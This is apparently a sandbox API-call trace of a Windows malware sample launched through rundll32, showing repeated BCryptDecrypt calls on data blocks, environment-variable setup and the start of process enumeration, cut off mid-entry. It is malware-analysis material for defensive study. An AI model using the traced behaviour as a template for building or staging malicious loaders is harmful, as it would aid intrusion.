pbIV=0x0, pbOutput=0x206c9ed, pcbResult=0x14f8fc) returned 0x0 [0181.349] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptDecrypt") returned 0x7ffc5bcc5780 [0181.349] BCryptDecrypt (in: hKey=0x2c82b00, pbInput=0x1eaa6d0, cbInput=0x100, pPaddingInfo=0x0, pbIV=0x0, cbIV=0x0, pbOutput=0x206cae2, cbOutput=0xf5, pcbResult=0x14f8fc, dwFlags=0x2 | out: hKey=0x2c82b00, pbIV=0x0, pbOutput=0x206cae2, pcbResult=0x14f8fc) returned 0x0 [0181.351] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptDecrypt") returned 0x7ffc5bcc5780 [0181.587] BCryptDecrypt (in: hKey=0x2c82b00, pbInput=0x1eaa7d0, cbInput=0x100, pPaddingInfo=0x0, pbIV=0x0, cbIV=0x0, pbOutput=0x206cbd7, cbOutput=0xf5, pcbResult=0x14f8fc, dwFlags=0x2 | out: hKey=0x2c82b00, pbIV=0x0, pbOutput=0x206cbd7, pcbResult=0x14f8fc) returned 0x0 [0181.589] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptDecrypt") returned 0x7ffc5bcc5780 [0181.589] BCryptDecrypt (in: hKey=0x2c82b00, pbInput=0x1eaa8d0, cbInput=0x100, pPaddingInfo=0x0, pbIV=0x0, cbIV=0x0, pbOutput=0x206cccc, cbOutput=0xf5, pcbResult=0x14f8fc, dwFlags=0x2 | out: hKey=0x2c82b00, pbIV=0x0, pbOutput=0x206cccc, pcbResult=0x14f8fc) returned 0x0 [0181.594] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptDecrypt") returned 0x7ffc5bcc5780 [0181.594] BCryptDecrypt (in: hKey=0x2c82b00, pbInput=0x1eaa9d0, cbInput=0x100, pPaddingInfo=0x0, pbIV=0x0, cbIV=0x0, pbOutput=0x206cdc1, cbOutput=0xf5, pcbResult=0x14f8fc, dwFlags=0x2 | out: hKey=0x2c82b00, pbIV=0x0, pbOutput=0x206cdc1, pcbResult=0x14f8fc) returned 0x0 [0181.596] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptDecrypt") returned 0x7ffc5bcc5780 [0181.596] BCryptDecrypt (in: hKey=0x2c82b00, pbInput=0x1eaaad0, cbInput=0x100, pPaddingInfo=0x0, pbIV=0x0, cbIV=0x0, pbOutput=0x206ceb6, cbOutput=0xf5, pcbResult=0x14f8fc, dwFlags=0x2 | out: hKey=0x2c82b00, pbIV=0x0, pbOutput=0x206ceb6, pcbResult=0x14f8fc) returned 0x0 [0181.598] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptDecrypt") returned 0x7ffc5bcc5780 [0181.598] BCryptDecrypt (in: hKey=0x2c82b00, pbInput=0x1eaabd0, cbInput=0x100, pPaddingInfo=0x0, pbIV=0x0, cbIV=0x0, pbOutput=0x206cfab, cbOutput=0xf5, pcbResult=0x14f8fc, dwFlags=0x2 | out: hKey=0x2c82b00, pbIV=0x0, pbOutput=0x206cfab, pcbResult=0x14f8fc) returned 0x0 [0181.599] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptDecrypt") returned 0x7ffc5bcc5780 [0181.599] BCryptDecrypt (in: hKey=0x2c82b00, pbInput=0x1eaacd0, cbInput=0x100, pPaddingInfo=0x0, pbIV=0x0, cbIV=0x0, pbOutput=0x206d0a0, cbOutput=0xf5, pcbResult=0x14f8fc, dwFlags=0x2 | out: hKey=0x2c82b00, pbIV=0x0, pbOutput=0x206d0a0, pcbResult=0x14f8fc) returned 0x0 [0181.601] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptDecrypt") returned 0x7ffc5bcc5780 [0181.601] BCryptDecrypt (in: hKey=0x2c82b00, pbInput=0x1eaadd0, cbInput=0x100, pPaddingInfo=0x0, pbIV=0x0, cbIV=0x0, pbOutput=0x206d195, cbOutput=0xf5, pcbResult=0x14f8fc, dwFlags=0x2 | out: hKey=0x2c82b00, pbIV=0x0, pbOutput=0x206d195, pcbResult=0x14f8fc) returned 0x0 [0181.603] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptDecrypt") returned 0x7ffc5bcc5780 [0181.603] BCryptDecrypt (in: hKey=0x2c82b00, pbInput=0x1eaaed0, cbInput=0x100, pPaddingInfo=0x0, pbIV=0x0, cbIV=0x0, pbOutput=0x206d28a, cbOutput=0xf5, pcbResult=0x14f8fc, dwFlags=0x2 | out: hKey=0x2c82b00, pbIV=0x0, pbOutput=0x206d28a, pcbResult=0x14f8fc) returned 0x0 [0181.605] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptDecrypt") returned 0x7ffc5bcc5780 [0181.605] BCryptDecrypt (in: hKey=0x2c82b00, pbInput=0x1eaafd0, cbInput=0x100, pPaddingInfo=0x0, pbIV=0x0, cbIV=0x0, pbOutput=0x206d37f, cbOutput=0xf5, pcbResult=0x14f8fc, dwFlags=0x2 | out: hKey=0x2c82b00, pbIV=0x0, pbOutput=0x206d37f, pcbResult=0x14f8fc) returned 0x0 [0181.607] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptDecrypt") returned 0x7ffc5bcc5780 [0181.607] BCryptDecrypt (in: hKey=0x2c82b00, pbInput=0x1eab0d0, cbInput=0x100, pPaddingInfo=0x0, pbIV=0x0, cbIV=0x0, pbOutput=0x206d474, cbOutput=0xf5, pcbResult=0x14f8fc, dwFlags=0x2 | out: hKey=0x2c82b00, pbIV=0x0, pbOutput=0x206d474, pcbResult=0x14f8fc) returned 0x0 [0181.609] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptDecrypt") returned 0x7ffc5bcc5780 [0181.609] BCryptDecrypt (in: hKey=0x2c82b00, pbInput=0x1eab1d0, cbInput=0x100, pPaddingInfo=0x0, pbIV=0x0, cbIV=0x0, pbOutput=0x206d569, cbOutput=0xf5, pcbResult=0x14f8fc, dwFlags=0x2 | out: hKey=0x2c82b00, pbIV=0x0, pbOutput=0x206d569, pcbResult=0x14f8fc) returned 0x0 [0181.610] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptDecrypt") returned 0x7ffc5bcc5780 [0181.610] BCryptDecrypt (in: hKey=0x2c82b00, pbInput=0x1eab2d0, cbInput=0x100, pPaddingInfo=0x0, pbIV=0x0, cbIV=0x0, pbOutput=0x206d65e, cbOutput=0xf5, pcbResult=0x14f8fc, dwFlags=0x2 | out: hKey=0x2c82b00, pbIV=0x0, pbOutput=0x206d65e, pcbResult=0x14f8fc) returned 0x0 [0181.611] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptDecrypt") returned 0x7ffc5bcc5780 [0181.611] BCryptDecrypt (in: hKey=0x2c82b00, pbInput=0x1eab3d0, cbInput=0x100, pPaddingInfo=0x0, pbIV=0x0, cbIV=0x0, pbOutput=0x206d753, cbOutput=0xf5, pcbResult=0x14f8fc, dwFlags=0x2 | out: hKey=0x2c82b00, pbIV=0x0, pbOutput=0x206d753, pcbResult=0x14f8fc) returned 0x0 [0181.613] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptDecrypt") returned 0x7ffc5bcc5780 [0181.613] BCryptDecrypt (in: hKey=0x2c82b00, pbInput=0x1eab4d0, cbInput=0x100, pPaddingInfo=0x0, pbIV=0x0, cbIV=0x0, pbOutput=0x206d848, cbOutput=0xf5, pcbResult=0x14f8fc, dwFlags=0x2 | out: hKey=0x2c82b00, pbIV=0x0, pbOutput=0x206d848, pcbResult=0x14f8fc) returned 0x0 [0181.615] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptDecrypt") returned 0x7ffc5bcc5780 [0181.615] BCryptDecrypt (in: hKey=0x2c82b00, pbInput=0x1eab5d0, cbInput=0x100, pPaddingInfo=0x0, pbIV=0x0, cbIV=0x0, pbOutput=0x206d93d, cbOutput=0xf5, pcbResult=0x14f8fc, dwFlags=0x2 | out: hKey=0x2c82b00, pbIV=0x0, pbOutput=0x206d93d, pcbResult=0x14f8fc) returned 0x0 [0181.616] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptDecrypt") returned 0x7ffc5bcc5780 [0181.616] BCryptDecrypt (in: hKey=0x2c82b00, pbInput=0x1eab6d0, cbInput=0x100, pPaddingInfo=0x0, pbIV=0x0, cbIV=0x0, pbOutput=0x206da32, cbOutput=0xf5, pcbResult=0x14f8fc, dwFlags=0x2 | out: hKey=0x2c82b00, pbIV=0x0, pbOutput=0x206da32, pcbResult=0x14f8fc) returned 0x0 [0181.618] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptDecrypt") returned 0x7ffc5bcc5780 [0181.618] BCryptDecrypt (in: hKey=0x2c82b00, pbInput=0x1eab7d0, cbInput=0x100, pPaddingInfo=0x0, pbIV=0x0, cbIV=0x0, pbOutput=0x206db27, cbOutput=0xf5, pcbResult=0x14f8fc, dwFlags=0x2 | out: hKey=0x2c82b00, pbIV=0x0, pbOutput=0x206db27, pcbResult=0x14f8fc) returned 0x0 [0181.620] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptDecrypt") returned 0x7ffc5bcc5780 [0181.620] BCryptDecrypt (in: hKey=0x2c82b00, pbInput=0x1eab8d0, cbInput=0x100, pPaddingInfo=0x0, pbIV=0x0, cbIV=0x0, pbOutput=0x206dc1c, cbOutput=0xf5, pcbResult=0x14f8fc, dwFlags=0x2 | out: hKey=0x2c82b00, pbIV=0x0, pbOutput=0x206dc1c, pcbResult=0x14f8fc) returned 0x0 [0181.622] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptDecrypt") returned 0x7ffc5bcc5780 [0181.622] BCryptDecrypt (in: hKey=0x2c82b00, pbInput=0x1eab9d0, cbInput=0x100, pPaddingInfo=0x0, pbIV=0x0, cbIV=0x0, pbOutput=0x206dd11, cbOutput=0xf5, pcbResult=0x14f8fc, dwFlags=0x2 | out: hKey=0x2c82b00, pbIV=0x0, pbOutput=0x206dd11, pcbResult=0x14f8fc) returned 0x0 [0181.624] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptDecrypt") returned 0x7ffc5bcc5780 [0181.824] BCryptDecrypt (in: hKey=0x2c82b00, pbInput=0x1eabad0, cbInput=0x100, pPaddingInfo=0x0, pbIV=0x0, cbIV=0x0, pbOutput=0x206de06, cbOutput=0xf5, pcbResult=0x14f8fc, dwFlags=0x2 | out: hKey=0x2c82b00, pbIV=0x0, pbOutput=0x206de06, pcbResult=0x14f8fc) returned 0x0 [0181.825] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptDecrypt") returned 0x7ffc5bcc5780 [0181.825] BCryptDecrypt (in: hKey=0x2c82b00, pbInput=0x1eabbd0, cbInput=0x100, pPaddingInfo=0x0, pbIV=0x0, cbIV=0x0, pbOutput=0x206defb, cbOutput=0xf5, pcbResult=0x14f8fc, dwFlags=0x2 | out: hKey=0x2c82b00, pbIV=0x0, pbOutput=0x206defb, pcbResult=0x14f8fc) returned 0x0 [0181.827] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptDecrypt") returned 0x7ffc5bcc5780 [0181.827] BCryptDecrypt (in: hKey=0x2c82b00, pbInput=0x1eabcd0, cbInput=0x100, pPaddingInfo=0x0, pbIV=0x0, cbIV=0x0, pbOutput=0x206dff0, cbOutput=0xf5, pcbResult=0x14f8fc, dwFlags=0x2 | out: hKey=0x2c82b00, pbIV=0x0, pbOutput=0x206dff0, pcbResult=0x14f8fc) returned 0x0 [0181.828] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptDecrypt") returned 0x7ffc5bcc5780 [0181.829] BCryptDecrypt (in: hKey=0x2c82b00, pbInput=0x1eabdd0, cbInput=0x100, pPaddingInfo=0x0, pbIV=0x0, cbIV=0x0, pbOutput=0x206e0e5, cbOutput=0xf5, pcbResult=0x14f8fc, dwFlags=0x2 | out: hKey=0x2c82b00, pbIV=0x0, pbOutput=0x206e0e5, pcbResult=0x14f8fc) returned 0x0 [0181.830] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptDecrypt") returned 0x7ffc5bcc5780 [0181.830] BCryptDecrypt (in: hKey=0x2c82b00, pbInput=0x1eabed0, cbInput=0x100, pPaddingInfo=0x0, pbIV=0x0, cbIV=0x0, pbOutput=0x206e1da, cbOutput=0xf5, pcbResult=0x14f8fc, dwFlags=0x2 | out: hKey=0x2c82b00, pbIV=0x0, pbOutput=0x206e1da, pcbResult=0x14f8fc) returned 0x0 [0181.832] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptDecrypt") returned 0x7ffc5bcc5780 [0181.832] BCryptDecrypt (in: hKey=0x2c82b00, pbInput=0x1eabfd0, cbInput=0x100, pPaddingInfo=0x0, pbIV=0x0, cbIV=0x0, pbOutput=0x206e2cf, cbOutput=0xf5, pcbResult=0x14f8fc, dwFlags=0x2 | out: hKey=0x2c82b00, pbIV=0x0, pbOutput=0x206e2cf, pcbResult=0x14f8fc) returned 0x0 [0181.833] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptDecrypt") returned 0x7ffc5bcc5780 [0181.833] BCryptDecrypt (in: hKey=0x2c82b00, pbInput=0x1eac0d0, cbInput=0x100, pPaddingInfo=0x0, pbIV=0x0, cbIV=0x0, pbOutput=0x206e3c4, cbOutput=0xf5, pcbResult=0x14f8fc, dwFlags=0x2 | out: hKey=0x2c82b00, pbIV=0x0, pbOutput=0x206e3c4, pcbResult=0x14f8fc) returned 0x0 [0181.834] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptDecrypt") returned 0x7ffc5bcc5780 [0181.834] BCryptDecrypt (in: hKey=0x2c82b00, pbInput=0x1eac1d0, cbInput=0x100, pPaddingInfo=0x0, pbIV=0x0, cbIV=0x0, pbOutput=0x206e4b9, cbOutput=0xf5, pcbResult=0x14f8fc, dwFlags=0x2 | out: hKey=0x2c82b00, pbIV=0x0, pbOutput=0x206e4b9, pcbResult=0x14f8fc) returned 0x0 [0181.836] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptDecrypt") returned 0x7ffc5bcc5780 [0181.836] BCryptDecrypt (in: hKey=0x2c82b00, pbInput=0x1eac2d0, cbInput=0x100, pPaddingInfo=0x0, pbIV=0x0, cbIV=0x0, pbOutput=0x206e5ae, cbOutput=0xf5, pcbResult=0x14f8fc, dwFlags=0x2 | out: hKey=0x2c82b00, pbIV=0x0, pbOutput=0x206e5ae, pcbResult=0x14f8fc) returned 0x0 [0181.837] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptDecrypt") returned 0x7ffc5bcc5780 [0181.837] BCryptDecrypt (in: hKey=0x2c82b00, pbInput=0x1eac3d0, cbInput=0x100, pPaddingInfo=0x0, pbIV=0x0, cbIV=0x0, pbOutput=0x206e6a3, cbOutput=0xf5, pcbResult=0x14f8fc, dwFlags=0x2 | out: hKey=0x2c82b00, pbIV=0x0, pbOutput=0x206e6a3, pcbResult=0x14f8fc) returned 0x0 [0181.839] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptDecrypt") returned 0x7ffc5bcc5780 [0181.839] BCryptDecrypt (in: hKey=0x2c82b00, pbInput=0x1eac4d0, cbInput=0x100, pPaddingInfo=0x0, pbIV=0x0, cbIV=0x0, pbOutput=0x206e798, cbOutput=0xf5, pcbResult=0x14f8fc, dwFlags=0x2 | out: hKey=0x2c82b00, pbIV=0x0, pbOutput=0x206e798, pcbResult=0x14f8fc) returned 0x0 [0181.840] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptDecrypt") returned 0x7ffc5bcc5780 [0181.840] BCryptDecrypt (in: hKey=0x2c82b00, pbInput=0x1eac5d0, cbInput=0x100, pPaddingInfo=0x0, pbIV=0x0, cbIV=0x0, pbOutput=0x206e88d, cbOutput=0xf5, pcbResult=0x14f8fc, dwFlags=0x2 | out: hKey=0x2c82b00, pbIV=0x0, pbOutput=0x206e88d, pcbResult=0x14f8fc) returned 0x0 [0181.842] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptDecrypt") returned 0x7ffc5bcc5780 [0181.842] BCryptDecrypt (in: hKey=0x2c82b00, pbInput=0x1eac6d0, cbInput=0x100, pPaddingInfo=0x0, pbIV=0x0, cbIV=0x0, pbOutput=0x206e982, cbOutput=0xf5, pcbResult=0x14f8fc, dwFlags=0x2 | out: hKey=0x2c82b00, pbIV=0x0, pbOutput=0x206e982, pcbResult=0x14f8fc) returned 0x0 [0181.843] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptDecrypt") returned 0x7ffc5bcc5780 [0181.843] BCryptDecrypt (in: hKey=0x2c82b00, pbInput=0x1eac7d0, cbInput=0x100, pPaddingInfo=0x0, pbIV=0x0, cbIV=0x0, pbOutput=0x206ea77, cbOutput=0xf5, pcbResult=0x14f8fc, dwFlags=0x2 | out: hKey=0x2c82b00, pbIV=0x0, pbOutput=0x206ea77, pcbResult=0x14f8fc) returned 0x0 [0181.845] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptDecrypt") returned 0x7ffc5bcc5780 [0181.845] BCryptDecrypt (in: hKey=0x2c82b00, pbInput=0x1eac8d0, cbInput=0x100, pPaddingInfo=0x0, pbIV=0x0, cbIV=0x0, pbOutput=0x206eb6c, cbOutput=0xf5, pcbResult=0x14f8fc, dwFlags=0x2 | out: hKey=0x2c82b00, pbIV=0x0, pbOutput=0x206eb6c, pcbResult=0x14f8fc) returned 0x0 [0181.846] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptDecrypt") returned 0x7ffc5bcc5780 [0181.846] BCryptDecrypt (in: hKey=0x2c82b00, pbInput=0x1eac9d0, cbInput=0x100, pPaddingInfo=0x0, pbIV=0x0, cbIV=0x0, pbOutput=0x206ec61, cbOutput=0xf5, pcbResult=0x14f8fc, dwFlags=0x2 | out: hKey=0x2c82b00, pbIV=0x0, pbOutput=0x206ec61, pcbResult=0x14f8fc) returned 0x0 [0181.848] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptDecrypt") returned 0x7ffc5bcc5780 [0181.848] BCryptDecrypt (in: hKey=0x2c82b00, pbInput=0x1eacad0, cbInput=0x100, pPaddingInfo=0x0, pbIV=0x0, cbIV=0x0, pbOutput=0x206ed56, cbOutput=0xf5, pcbResult=0x14f8fc, dwFlags=0x2 | out: hKey=0x2c82b00, pbIV=0x0, pbOutput=0x206ed56, pcbResult=0x14f8fc) returned 0x0 [0181.850] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptDecrypt") returned 0x7ffc5bcc5780 [0181.850] BCryptDecrypt (in: hKey=0x2c82b00, pbInput=0x1eacbd0, cbInput=0x100, pPaddingInfo=0x0, pbIV=0x0, cbIV=0x0, pbOutput=0x206ee4b, cbOutput=0xf5, pcbResult=0x14f8fc, dwFlags=0x2 | out: hKey=0x2c82b00, pbIV=0x0, pbOutput=0x206ee4b, pcbResult=0x14f8fc) returned 0x0 [0181.851] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptDecrypt") returned 0x7ffc5bcc5780 [0181.851] BCryptDecrypt (in: hKey=0x2c82b00, pbInput=0x1eaccd0, cbInput=0x100, pPaddingInfo=0x0, pbIV=0x0, cbIV=0x0, pbOutput=0x206ef40, cbOutput=0xf5, pcbResult=0x14f8fc, dwFlags=0x2 | out: hKey=0x2c82b00, pbIV=0x0, pbOutput=0x206ef40, pcbResult=0x14f8fc) returned 0x0 [0181.853] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptDecrypt") returned 0x7ffc5bcc5780 [0181.853] BCryptDecrypt (in: hKey=0x2c82b00, pbInput=0x1eacdd0, cbInput=0x100, pPaddingInfo=0x0, pbIV=0x0, cbIV=0x0, pbOutput=0x206f035, cbOutput=0xf5, pcbResult=0x14f8fc, dwFlags=0x2 | out: hKey=0x2c82b00, pbIV=0x0, pbOutput=0x206f035, pcbResult=0x14f8fc) returned 0x0 [0181.854] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptDecrypt") returned 0x7ffc5bcc5780 [0181.854] BCryptDecrypt (in: hKey=0x2c82b00, pbInput=0x1eaced0, cbInput=0x100, pPaddingInfo=0x0, pbIV=0x0, cbIV=0x0, pbOutput=0x206f12a, cbOutput=0xf5, pcbResult=0x14f8fc, dwFlags=0x2 | out: hKey=0x2c82b00, pbIV=0x0, pbOutput=0x206f12a, pcbResult=0x14f8fc) returned 0x0 [0181.856] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptDecrypt") returned 0x7ffc5bcc5780 [0181.856] BCryptDecrypt (in: hKey=0x2c82b00, pbInput=0x1eacfd0, cbInput=0x100, pPaddingInfo=0x0, pbIV=0x0, cbIV=0x0, pbOutput=0x206f21f, cbOutput=0xf5, pcbResult=0x14f8fc, dwFlags=0x2 | out: hKey=0x2c82b00, pbIV=0x0, pbOutput=0x206f21f, pcbResult=0x14f8fc) returned 0x0 [0181.857] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptDecrypt") returned 0x7ffc5bcc5780 [0181.857] BCryptDecrypt (in: hKey=0x2c82b00, pbInput=0x1ead0d0, cbInput=0x100, pPaddingInfo=0x0, pbIV=0x0, cbIV=0x0, pbOutput=0x206f314, cbOutput=0xf5, pcbResult=0x14f8fc, dwFlags=0x2 | out: hKey=0x2c82b00, pbIV=0x0, pbOutput=0x206f314, pcbResult=0x14f8fc) returned 0x0 [0182.042] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptDecrypt") returned 0x7ffc5bcc5780 [0182.042] BCryptDecrypt (in: hKey=0x2c82b00, pbInput=0x1ead1d0, cbInput=0x100, pPaddingInfo=0x0, pbIV=0x0, cbIV=0x0, pbOutput=0x206f409, cbOutput=0xf5, pcbResult=0x14f8fc, dwFlags=0x2 | out: hKey=0x2c82b00, pbIV=0x0, pbOutput=0x206f409, pcbResult=0x14f8fc) returned 0x0 [0182.044] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptDecrypt") returned 0x7ffc5bcc5780 [0182.044] BCryptDecrypt (in: hKey=0x2c82b00, pbInput=0x1ead2d0, cbInput=0x100, pPaddingInfo=0x0, pbIV=0x0, cbIV=0x0, pbOutput=0x206f4fe, cbOutput=0xf5, pcbResult=0x14f8fc, dwFlags=0x2 | out: hKey=0x2c82b00, pbIV=0x0, pbOutput=0x206f4fe, pcbResult=0x14f8fc) returned 0x0 [0182.046] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptDecrypt") returned 0x7ffc5bcc5780 [0182.046] BCryptDecrypt (in: hKey=0x2c82b00, pbInput=0x1ead3d0, cbInput=0x100, pPaddingInfo=0x0, pbIV=0x0, cbIV=0x0, pbOutput=0x206f5f3, cbOutput=0xf5, pcbResult=0x14f8fc, dwFlags=0x2 | out: hKey=0x2c82b00, pbIV=0x0, pbOutput=0x206f5f3, pcbResult=0x14f8fc) returned 0x0 [0182.048] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptDecrypt") returned 0x7ffc5bcc5780 [0182.048] BCryptDecrypt (in: hKey=0x2c82b00, pbInput=0x1ead4d0, cbInput=0x100, pPaddingInfo=0x0, pbIV=0x0, cbIV=0x0, pbOutput=0x206f6e8, cbOutput=0xf5, pcbResult=0x14f8fc, dwFlags=0x2 | out: hKey=0x2c82b00, pbIV=0x0, pbOutput=0x206f6e8, pcbResult=0x14f8fc) returned 0x0 [0182.049] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptDecrypt") returned 0x7ffc5bcc5780 [0182.049] BCryptDecrypt (in: hKey=0x2c82b00, pbInput=0x1ead5d0, cbInput=0x100, pPaddingInfo=0x0, pbIV=0x0, cbIV=0x0, pbOutput=0x206f7dd, cbOutput=0xf5, pcbResult=0x14f8fc, dwFlags=0x2 | out: hKey=0x2c82b00, pbIV=0x0, pbOutput=0x206f7dd, pcbResult=0x14f8fc) returned 0x0 [0182.052] GetProcessHeap () returned 0x440000 [0182.052] HeapFree (in: hHeap=0x440000, dwFlags=0x0, lpMem=0x1e65cd0 | out: hHeap=0x440000) returned 1 [0182.060] GetProcessHeap () returned 0x440000 [0182.060] HeapFree (in: hHeap=0x440000, dwFlags=0x0, lpMem=0x2caee90 | out: hHeap=0x440000) returned 1 [0182.060] GetProcAddress (hModule=0x7ffc51070000, lpProcName="InternetCloseHandle") returned 0x7ffc510af7f0 [0182.060] InternetCloseHandle (hInternet=0xcc0008) returned 1 [0182.060] GetProcessHeap () returned 0x440000 [0182.060] HeapFree (in: hHeap=0x440000, dwFlags=0x0, lpMem=0x2ca67b0 | out: hHeap=0x440000) returned 1 [0182.062] lstrcpyW (in: lpString1=0x14f4b8, lpString2="VARS" | out: lpString1="VARS") returned="VARS" [0182.062] lstrcpyW (in: lpString1=0x14f4b2, lpString2="19" | out: lpString1="19") returned="19" [0182.063] GetProcAddress (hModule=0x7ffc5ecd0000, lpProcName="SetEnvironmentVariableW") returned 0x7ffc5ecf7500 [0182.063] SetEnvironmentVariableW (lpName="VARS", lpValue="19") returned 1 [0182.063] lstrcpyW (in: lpString1=0x14f510, lpString2="PARENTCMDLINE" | out: lpString1="PARENTCMDLINE") returned="PARENTCMDLINE" [0182.063] GetProcAddress (hModule=0x7ffc5ecd0000, lpProcName="SetEnvironmentVariableW") returned 0x7ffc5ecf7500 [0182.063] SetEnvironmentVariableW (lpName="PARENTCMDLINE", lpValue="\"C:\\Users\\RDhJ0CNFevzX\\Desktop\\GIUmlOL.exe\" /dll=\"C:\\Users\\RDHJ0C~1\\Desktop\\8b971c2c4c9a020eb274c36db20bc0e1b203a7909d63f48f99bef5594110929f.exe.dll\" /fn_id=DllRegisterServer") returned 1 [0182.063] lstrcpyW (in: lpString1=0x14f4d0, lpString2="PARENTUTIL" | out: lpString1="PARENTUTIL") returned="PARENTUTIL" [0182.064] GetProcAddress (hModule=0x7ffc5ecd0000, lpProcName="SetEnvironmentVariableW") returned 0x7ffc5ecf7500 [0182.064] SetEnvironmentVariableW (lpName="PARENTUTIL", lpValue="C:\\Windows\\System32\\rundll32.exe") returned 1 [0182.064] lstrcpyW (in: lpString1=0x14f550, lpString2="PARENTFRONTARGS" | out: lpString1="PARENTFRONTARGS") returned="PARENTFRONTARGS" [0182.064] GetProcAddress (hModule=0x7ffc5ecd0000, lpProcName="SetEnvironmentVariableW") returned 0x7ffc5ecf7500 [0182.064] SetEnvironmentVariableW (lpName="PARENTFRONTARGS", lpValue="") returned 1 [0182.064] lstrcpyW (in: lpString1=0x14f4c2, lpString2="PARENT" | out: lpString1="PARENT") returned="PARENT" [0182.064] GetProcAddress (hModule=0x7ffc5ecd0000, lpProcName="SetEnvironmentVariableW") returned 0x7ffc5ecf7500 [0182.064] SetEnvironmentVariableW (lpName="PARENT", lpValue="C:\\Users\\RDHJ0C~1\\Desktop\\8b971c2c4c9a020eb274c36db20bc0e1b203a7909d63f48f99bef5594110929f.exe.dll") returned 1 [0182.064] lstrcpyW (in: lpString1=0x14f530, lpString2="PARENTAFTERARGS" | out: lpString1="PARENTAFTERARGS") returned="PARENTAFTERARGS" [0182.065] GetProcAddress (hModule=0x7ffc5ecd0000, lpProcName="SetEnvironmentVariableW") returned 0x7ffc5ecf7500 [0182.065] SetEnvironmentVariableW (lpName="PARENTAFTERARGS", lpValue="DllRegisterServer") returned 1 [0182.065] GetProcAddress (hModule=0x7ffc5e3e0000, lpProcName="StringFromCLSID") returned 0x7ffc5f301820 [0182.066] StringFromCLSID (in: rclsid=0x1800141a0*(Data1=0xdf6cb9bd, Data2=0x505a, Data3=0x4aa5, Data4=([0]=0x84, [1]=0x7, [2]=0x90, [3]=0xce, [4]=0x92, [5]=0x10, [6]=0x5f, [7]=0x85)), lplpsz=0x14f4a8 | out: lplpsz=0x14f4a8*="{DF6CB9BD-505A-4AA5-8407-90CE92105F85}") returned 0x0 [0182.066] lstrcpyW (in: lpString1=0x14f4f0, lpString2="PARENTJOBID" | out: lpString1="PARENTJOBID") returned="PARENTJOBID" [0182.066] GetProcAddress (hModule=0x7ffc5ecd0000, lpProcName="SetEnvironmentVariableW") returned 0x7ffc5ecf7500 [0182.066] SetEnvironmentVariableW (lpName="PARENTJOBID", lpValue="{DF6CB9BD-505A-4AA5-8407-90CE92105F85}") returned 1 [0182.066] GetProcAddress (hModule=0x7ffc5e3e0000, lpProcName="CoTaskMemFree") returned 0x7ffc5f33d2c0 [0182.066] CoTaskMemFree (pv=0x2d01f40) [0182.067] GetProcAddress (hModule=0x7ffc5ecd0000, lpProcName="CreateToolhelp32Snapshot") returned 0x7ffc5ecfe800 [0182.067] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x648 [0182.271] GetProcAddress (hModule=0x7ffc5ecd0000, lpProcName="Process32First") returned 0x7ffc5ed185d0 [0182.271] Process32First (in: hSnapshot=0x648, lppe=0x14f428 | out: lppe=0x14f428*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0182.272] GetProcAddress (hModule=0x7ffc5ecd0000, lpProcName="Process32Next") returned 0x7ffc5ed186c0 [0182.272] Process32Next (in: hSnapshot=0x648, lppe=0x14f428 | out: lppe=0x14f428*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x4, th32DefaultHeapID=0x0, th32ModuleID=0x0, 